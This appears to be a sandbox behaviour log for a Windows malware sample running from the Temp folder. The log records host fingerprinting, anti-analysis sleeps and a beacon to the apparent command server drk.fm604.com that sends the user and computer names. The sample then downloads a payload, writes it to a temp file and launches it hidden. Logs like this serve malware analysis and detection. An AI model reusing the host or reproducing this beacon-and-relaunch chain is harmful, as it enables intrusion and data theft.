1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Handle | module_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, base_address = 0x400000 |
|
2 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualQuery, address_out = 0x765b7a90 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x765bac70 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| System | Get Computer Name | result_out = X2VS1CUM |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = DigitalProductId, data = 164 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = InstallDate, data = 63 |
|
1 | |
| System | Get Computer Name | result_out = X2VS1CUM |
|
1 | |
| Environment | Set Environment String | name = USERNAME, value = Nd9E1FYi |
|
1 | |
| Module | Load | module_name = ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = ZwOpenProcess, address_out = 0x779d6f00 |
|
1 | |
| Module | Load | module_name = ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = ZwOpenProcessToken, address_out = 0x779d7e10 |
|
1 | |
| Module | Load | module_name = ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = ZwQueryInformationToken, address_out = 0x779d6eb0 |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
5 | |
| System | Get Time | type = Ticks, time = 152500 |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Bind | protocol = IPPROTO_IP, local_address = 127.0.0.1, local_port = 5504 |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| Environment | Set Environment String | name = standalonemtm, value = true |
|
1 | |
| Environment | Set Environment String | name = vendor_id, value = exe_scheduler_2816 |
|
1 | |
| Environment | Set Environment String | name = mainprocessoverride, value = svchost.exe |
|
1 | |
| Environment | Set Environment String | name = RandomListenPortBase, value = 6000 |
|
1 |
Thread 0x9d8
2
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Sleep | duration = 50000 milliseconds (50.000 seconds) |
|
1 | |
| Debug | process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, type = DEBUG_STRING, text = OGG 0 |
|
1 |
Thread 0xd44
93
49
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe, size = 512, size_out = 512 |
|
249 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe, type = size |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe, size = 238592, size_out = 238592 |
|
1 | |
| System | Sleep | duration = 600000 milliseconds (600.000 seconds) |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe, size = 512, size_out = 512 |
|
249 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe, type = size |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe, size = 238592, size_out = 238592 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = ProxyEnable |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = ProxyEnable, data = 0 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0, access_type = INTERNET_OPEN_TYPE_DIRECT |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = drk.fm604.com, server_port = 443 |
|
1 | |
| Inet | Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /rpersist4/2091998236, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-File-Name: C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-User-Name: X2VS1CUM\Nd9E1FYi |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = ProxyServer |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = ProxyOverride |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = AutoConfigURL |
|
1 | |
| System | Get Computer Name | result_out = X2VS1CUM |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-ComputerName: X2VS1CUM |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-OSVersion: 6.2.9200| 0.0|1|0x00000100 |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-VendorId: 2816 |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\* |
|
1 | |
| Environment | Get Environment String | name = crackmeololo |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-IsTrustedComp: 0 |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-HTTP-Agent: WININET |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-Proxy-Present: FALSE |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-Proxy-Used: FALSE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = AutoDetect |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-Proxy-AutoDetect: FALSE |
|
1 | |
| Inet | Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = drk.fm604.com/rpersist4/2091998236 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 512, size_out = 512 |
|
249 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| File | Create Temp File | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\tmp8C77.tmp, path = C:\Users\Nd9E1FYi\AppData\Local\Temp\, prefix = tmp |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\tmp8C77.tmp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| System | Get Time | type = System Time, time = 2018-12-13 14:01:48 (UTC) |
|
1 | |
| File | Create | filename = C:\Windows\system32\cmd.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | type = time |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\tmp8C77.tmp, size = 251392 |
|
1 | |
| Process | Create | process_name = "C:\Users\Nd9E1FYi\AppData\Local\Temp\tmp8C77.tmp" --reinstall, os_pid = 0xe6c, creation_flags = CREATE_DETACHED_PROCESS, CREATE_BREAKAWAY_FROM_JOB, CREATE_NO_WINDOW, show_window = SW_HIDE |
|
1 | |
| System | Sleep | duration = 98189 milliseconds (98.189 seconds) |
|
1 |
Thread 0xd68
11736
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ProcessIdToSessionId, address_out = 0x765b8fa0 |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessTimes, address_out = 0x765c3dc0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFindAtomA, address_out = 0x765bd0c0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindAtomA, address_out = 0x765bef10 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = AddAtomA, address_out = 0x765bff60 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAddAtomA, address_out = 0x765b1bc0 |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Sleep | duration = 30 milliseconds (0.030 seconds) |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessTimes, address_out = 0x765c3dc0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFindAtomA, address_out = 0x765bd0c0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindAtomA, address_out = 0x765bef10 |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessTimes, address_out = 0x765c3dc0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFindAtomA, address_out = 0x765bd0c0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindAtomA, address_out = 0x765bef10 |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
